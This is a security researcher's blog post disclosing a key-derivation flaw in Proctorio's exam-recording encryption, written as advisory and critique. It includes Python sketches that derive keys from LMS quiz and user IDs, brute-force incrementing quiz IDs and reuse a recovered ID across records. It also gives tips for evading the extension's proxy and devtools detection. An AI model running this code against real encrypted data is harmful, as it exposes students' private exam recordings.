Wave Rake: Proctorio

A zero-knowledge encryption flaw, enabling trivial brute forces of student data when Canvas/Moodle is used.

This is my timeline of a flaw I discovered and reported in Proctorio's 'zero-knowledge' end-to-end encryption, and includes my thoughts on it. All statements are my opinions. No original source code is included; any examples use pseudocode that conveys purpose.

The Flaw: TL;DR

The encryption keys used to store all data recorded during the course of an exam are derived from the exam or quiz's “content ID” on the LMS. Canvas and Moodle use incrementing integers for their IDs, making a brute force trivial. I would estimate that an attacker who has already obtained encrypted data can brute-force the encryption at a rate of a few hours per recording on a commodity laptop, which could easily be accelerated with specialized tools or with more computing power.

I called it 'Wave Rake' as a homage to the lockpicking tool which allows locksmiths to quickly 'brute-force' their way into budget locks. Note that the writeup that follows is high on technical detail and probably low on readability.

What the flaw is not

The flaw does not enable any random person to go connect to Proctorio's servers, receive the data, and walk away with it. The threat model in this case includes a rogue employee at Proctorio who has datacenter access and wants to decrypt information, or a post-compromise event where a malicious actor has obtained encrypted information and needs to decrypt it.

Prologue

I started my research into Proctorio when I first heard we were using it for quizzes and exams at Miami University. I skimmed through public-facing documentation, and the one thing that stood out to me was the claim of 'zero-knowledge encryption', noting that they used AES-256 for it. AES is a symmetric cipher, so I immediately had doubts about how an AES key could be shared between professor and student without Proctorio ever handling the key material.

In addition, background research about the company brought up the usual suspects among Olsen's actions against students: posting student support logs in a Reddit squabble; suing Ian Linkletter, a learning technology specialist at UBC, for tweeting links to support material; and sending what was, in my opinion, a frivolous and almost entirely false retraction request for Shea Swauger's peer-reviewed academic paper, after which “The Proctorio Team” called it an opinion piece.

In addition to those, there was also the DMCA back-and-forth between Proctorio and Erik. Erik initially looked into the language translation files shipped with Proctorio and found strings which indicated that Proctorio had access to room scans and IDs, among other things. Proctorio subsequently used the DMCA to take down those tweets, which EFF attorneys called 'a textbook example of fair use'.

After seeing what Erik found and how Proctorio reacted to him, I began searching through their extension to try to verify their 'zero knowledge' encryption claims.

Obfuscation

During the course of my reverse engineering, I found that Proctorio uses JScrambler: the code contained annotations referring to it, specifically comments about skipping some of JScrambler's obfuscation passes. Those comments were removed in the latest version, though Proctorio still uses JScrambler; you can tell because their code makes use of Variable Masking and Regex Obfuscation, both JScrambler features.

This is noteworthy, because obfuscation of any form is against the Chrome Web Store Developer Program Policies:

Code Readability Requirements: Developers must not obfuscate code or conceal functionality of their extension. This also applies to any external code or resource fetched by the extension package.

There's another form of “obfuscation”: function renaming. Proctorio took several common CryptoJS functions used throughout their code and renamed them after intelligence agencies. For example (this may not reflect the actual code), md5 may become kgb, and aes might become cia.

This obfuscation of code and concealment of functionality is probably in violation of Chrome's policies, and probably in breach of Proctorio's agreement with Google to distribute the extension – I have attempted to contact Google regarding this, but have not heard back.

Nonetheless, I am working on tools to defeat variable masking and other similar obfuscation trickery – watch my blog for updates.

Code Tracing

Once you learn you're working with a (partially) obfuscated codebase, one of the simplest ways to start out is to look for calls to libraries – in Proctorio's case, looking for calls to CryptoJS/SJCL for encryption/decryption.
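As a rough illustration of that first pass, here is a minimal Python sketch that scans a JavaScript bundle for identifiers CryptoJS and SJCL are known to expose. The marker list and the function name find_crypto_call_sites are my own assumptions for illustration, not anything taken from the extension, and a build with renamed functions will hide some of these, so hits are only leads.

```python
import re
from typing import List, Tuple

# Hypothetical marker list: public identifiers from CryptoJS and SJCL.
# Renamed or masked builds may hide some of them, so treat hits as leads only.
CRYPTO_MARKERS = re.compile(r"\b(CryptoJS|sjcl|PBKDF2|AES|MD5)\b")


def find_crypto_call_sites(source: str, context: int = 40) -> List[Tuple[int, str]]:
    """Return (offset, surrounding snippet) for every marker found in source."""
    hits = []
    for match in CRYPTO_MARKERS.finditer(source):
        start = max(0, match.start() - context)
        end = min(len(source), match.end() + context)
        hits.append((match.start(), source[start:end]))
    return hits


if __name__ == "__main__":
    # Made-up one-line sample standing in for a minified bundle.
    sample = "var k=CryptoJS.PBKDF2(p,s,{keySize:8});"
    for offset, snippet in find_crypto_call_sites(sample):
        print(offset, snippet)
```

Each hit gives an offset to jump to in the bundle, which is usually enough to start renaming variables by hand around the call.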

Sometimes, this can send you down a rabbit hole – Proctorio's encryption calls happen in an 'event handler', as one of the hundreds of possible events, and access stuff from what appeared to be a part of the extension's global state.

I started by looking at where the key came from, and then traced all variables that were associated with the key generation. It used PBKDF2 to generate keys; the salt came from the result of a web request (we'll get back to this later), and the password came from some other global state.

The next step was to trace all writes to the global state – I did this manually, by renaming variables and then looking at all accesses to them. The important call that modified the part of the quiz state I was looking for is what I call QuizLoader for lack of a real name (minification removes names from source).

Each LMS has an associated QuizLoader, which sets up some global state for Proctorio. The QuizLoaders for Canvas and Moodle parse the URL for a 'Quiz ID' on Canvas or a 'Content Module ID' on Moodle – which is where the first half of the key comes from.
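To make the idea concrete, here is a minimal Python sketch of what such a loader has to do. It is not Proctorio's code: the function name extract_content_id is hypothetical, and the URL shapes (a /quizzes/<id> path segment on Canvas, and an id or cmid query parameter under /mod/quiz/ on Moodle) are my assumptions about typical installations.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlparse


def extract_content_id(url: str) -> Optional[str]:
    """Pull the numeric quiz/content ID out of an LMS quiz URL, if present."""
    parsed = urlparse(url)

    # Assumed Canvas shape: /courses/<course id>/quizzes/<quiz id>
    canvas = re.search(r"/quizzes/(\d+)", parsed.path)
    if canvas:
        return canvas.group(1)

    # Assumed Moodle shape: /mod/quiz/view.php?id=<id> or ...?cmid=<id>
    if "/mod/quiz/" in parsed.path:
        query = parse_qs(parsed.query)
        for name in ("id", "cmid"):
            values = query.get(name)
            if values and values[0].isdigit():
                return values[0]

    return None


if __name__ == "__main__":
    print(extract_content_id("https://canvas.example.edu/courses/12/quizzes/3456/take"))
    print(extract_content_id("https://moodle.example.edu/mod/quiz/view.php?id=789"))
```

The point to notice is that the extracted value is a short decimal number visible in the address bar, not a secret.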

Web Tracing

The second half of the key was returned from a web request made to Proctorio's servers, which meant I needed to perform some form of dynamic analysis. The options were to send duplicate web requests (mimicking the cookie handlers they registered with Chrome), to inject code into their extension (either to log the request to LocalStorage, which I could open and parse outside Chrome, or to look for .requestAnimationFrame() and the devtools page in order to bypass developer tools detection), or to man-in-the-middle the traffic with a proxy.

Proctorio attempts to detect most proxies – they do so by trying to read and clear the proxy settings stored in the browser. To get around this, one approach is to use a network-layer proxy. mitmproxy can be used as a network-layer proxy using a few iptables tricks on Linux – this is what I ended up using to listen in on the OAuth request made by Proctorio.

The response payloads are encrypted using a fixed AES key derived elsewhere from the version and extension ID, so the response isn't immediately visible, but it can still be decrypted. The jury is out on whether this too can be considered 'concealment of functionality' per the Chrome Developer Policies.

Once I had the response data decrypted, I was actually taken aback. They used the Canvas user ID for their encryption. (And as a bonus, the user ID is also a part of the /quiz/start payload, so they have that half of the key, and likely store it next to encrypted data.)

Show me the bug!

Now that you've made it this far, here is what the key generation essentially looks like:

key = PBKDF2(password=MD5(quizID), salt=MD5(userID), count=12048)

Correction: an earlier version of this article had quiz and user IDs swapped in the above line. Every other facet remains unchanged.

On Canvas and Moodle, the quiz ID is a simple increasing number, so with a count of 12,048, brute forcing it would only take a few hours at most on a commodity laptop.
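The derivation above, and the brute force it invites, can be sketched in Python. Several details here are assumptions on my part, because the pseudocode does not pin them down: IDs are hashed as decimal strings, the MD5 hex digests are fed to PBKDF2 as bytes, the PRF is HMAC-SHA1 (the CryptoJS default), and the output is 32 bytes to match AES-256. The is_correct_key callback is hypothetical; a real attacker would trial-decrypt a record and check for recognizable plaintext.

```python
import hashlib
from typing import Callable, Optional

ROUNDS = 12048  # round count given in the article


def derive_key(quiz_id: int, user_id: int, rounds: int = ROUNDS) -> bytes:
    """Sketch of key = PBKDF2(password=MD5(quizID), salt=MD5(userID), count)."""
    # Assumption: IDs are hashed as decimal strings and used as hex digests.
    password = hashlib.md5(str(quiz_id).encode()).hexdigest().encode()
    salt = hashlib.md5(str(user_id).encode()).hexdigest().encode()
    # Assumption: HMAC-SHA1 as the PRF and a 32-byte (AES-256) key.
    return hashlib.pbkdf2_hmac("sha1", password, salt, rounds, dklen=32)


def brute_force_quiz_id(
    user_id: int,
    is_correct_key: Callable[[bytes], bool],
    max_quiz_id: int,
    rounds: int = ROUNDS,
) -> Optional[int]:
    """Walk the incrementing quiz IDs until the candidate key checks out."""
    for quiz_id in range(1, max_quiz_id + 1):
        if is_correct_key(derive_key(quiz_id, user_id, rounds)):
            return quiz_id
    return None


if __name__ == "__main__":
    # Stand-in for trial decryption: compare against a key we derived ourselves.
    target = derive_key(quiz_id=37, user_id=1001)
    print(brute_force_quiz_id(1001, lambda key: key == target, max_quiz_id=100))
```

The search space is just the range of quiz IDs the LMS has handed out, and the user ID is already known from the /quiz/start payload, so the salt adds no secrecy.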

Pseudonymous disclosure

With what Proctorio was doing to my classmate and friend Erik Johnson, I did not feel like taking the risk of using a real identity to report the flaw. Instead, I concocted an “Alison Skye”, got them an account on ProtonMail, and eventually set up an Ubuntu VM with all traffic proxied over Tor to use Keybase to report the flaw.

OpSec was paramount: for my own safety, I strove to keep everything away from people who might say too much. I also had a temporary stint where I migrated everything to Qubes OS, before moving back to a more normal environment due to battery life concerns.

Recommendations for future security researchers: it might make more sense to use Tutanota instead of ProtonMail – they allow registrations over Tor without requiring any existing email, or any payment verification at the time of writing. Also, make sure you don't share initials with your pseudonym. (oops!)

Fixes

Proctorio hardened this key derivation to some extent about a week and a half after I reported it – some extra constant noise was added and the amount of time needed was increased by changing the round count to 12,048,000, but the flaw still exists in a reduced form.

While a brute force from scratch may still take about a week and a half, the problem here is the scalability of the brute force: once you find the quiz ID for one stored record, you can simply reuse it for other records at the same university with similar start and end times. With anywhere between 20 and 150 students on average per test, in my experience, that enables you to make quick work of the encryption by running one more specialized attack (say, hardware-accelerated crypto or GCP preemptible VMs) and then just trying the same quiz ID on similar records.
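Here is a minimal Python sketch of that amortization. It reuses the derivation shape from the original pseudocode and deliberately ignores the extra constant noise added in the fix, since I am not describing its details; the hashing choices (decimal-string IDs, MD5 hex digests, HMAC-SHA1, 32-byte key) and the name keys_for_same_quiz are assumptions for illustration.

```python
import hashlib
from typing import Dict, Iterable


def derive_key(quiz_id: int, user_id: int, rounds: int) -> bytes:
    """Same assumed shape as the original derivation; extra constants omitted."""
    password = hashlib.md5(str(quiz_id).encode()).hexdigest().encode()
    salt = hashlib.md5(str(user_id).encode()).hexdigest().encode()
    return hashlib.pbkdf2_hmac("sha1", password, salt, rounds, dklen=32)


def keys_for_same_quiz(
    quiz_id: int, user_ids: Iterable[int], rounds: int
) -> Dict[int, bytes]:
    """With the quiz ID recovered once, each further record costs one derivation."""
    return {user_id: derive_key(quiz_id, user_id, rounds) for user_id in user_ids}


if __name__ == "__main__":
    # Hypothetical values: quiz ID 37 recovered from one record, and three
    # user IDs taken from other records with similar start and end times.
    keys = keys_for_same_quiz(37, [1001, 1002, 1003], rounds=12048)
    for user_id, key in keys.items():
        print(user_id, key.hex())
```

Raising the round count makes the first search slower, but every additional record for the same quiz still costs a single derivation rather than a fresh search.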

In addition, Proctorio introduced what they call 'High Security Plus', though in my opinion that really should have been the default. In this mode, universities generate full RSA asymmetric keypairs, with the private key stored securely by either school IT or professors and the public key stored by Proctorio and delivered to students. Data encrypted with the public key can only be decrypted with the private key, and a brute force is non-trivial with current and future hardware.

The most pressing problem in this mode is key security – this shifts some of the onus from Proctorio to school IT teams; most professors strive to be the best they can be for their students, but from experiences I've heard across campuses, IT teams are less socially attached to the university.

Bonus: Open source

Here's a short list of open source libraries that I suspect are bundled with Proctorio that went without credit; just by Ctrl-F and looking for error messages – no 'reverse engineering' required!

The last one is pretty infamous, as they use mustache.js for all of their templating, include multiple copies of it, yet omit it from their Licenses list.

This is probably in violation of the MIT License used in these projects, though IANAL.

Bonus 2:

This one is golden enough that it speaks for itself:

$ strings proctorio.pexe | grep "mike"
/Users/mike/naclports/src/out/build/opencv/opencv-2.4.9/modules/objdetect/src/cascadedetect.cpp
/Users/mike/naclports/src/out/build/opencv/opencv-2.4.9/modules/core/src/alloc.cpp
/Users/mike/naclports/src/out/build/opencv/opencv-2.4.9/modules/core/src/matop.cpp

Hello, Olsen's Mac! (please use a CI. OpSec.)

Hall of... infamy?

Here's just a quick reminder that a lot of people missed that this was an issue.

On Responsible Disclosure

Some have asked me why I disclosed this to Proctorio in advance and waited for a fix. Others have asked why I did not disclose other things, like the missing credits for several open source projects in their code.

My answer is that I entered this field to protect student privacy. A bad actor with the knowledge to break the encryption could be bad news for the millions of students forced to use Proctorio. However, confidential documents floating on the open web or improper code reuse without regard for licenses are Proctorio's problem to deal with, not mine.

Takeaways

In an interview with TechRound, Proctorio's CEO Mike Olsen claimed that students “just make things up”. Here's the full quote once again:

It’s hilarious, students pretending to care where their data goes. Whether they’re cheating or not, I don’t really care, but then they go out and they just say things. They don’t do any research, they just make things up.

As a first-year university student, I beg to differ. I host this blog myself using WriteFreely, with only Cloudflare reverse proxying it to take load off my server. I do not track or sell any data, nor do I have any advertisements. Nor do I have to sign over any blog content to a third party (as with Hashnode, WordPress.com or similar).

There are a variety of good arguments against exam spyware, and there are people who do justice to various other issues, such as the DEI concerns, ableism, and so on, much better than I can.

Make no mistake, 'forgetting' to cite multiple sources in an academic environment would probably get you at least a warning on your transcript and at most an expulsion. Exam spyware companies manage to get away with it time and time again, though – and Proctorio wouldn't be the only one by a long shot.

And be it from Proctortrack or Proctorio (or several other vendors on my radar), security is often lacking, though to differing extents. For some perspective, Proctorio's encryption fail would be like getting a D- on a test nobody else even showed up for.

Reach me on @Oxylibrium on Twitter, or on [firstname].[lastname]@protonmail.com for inquiries.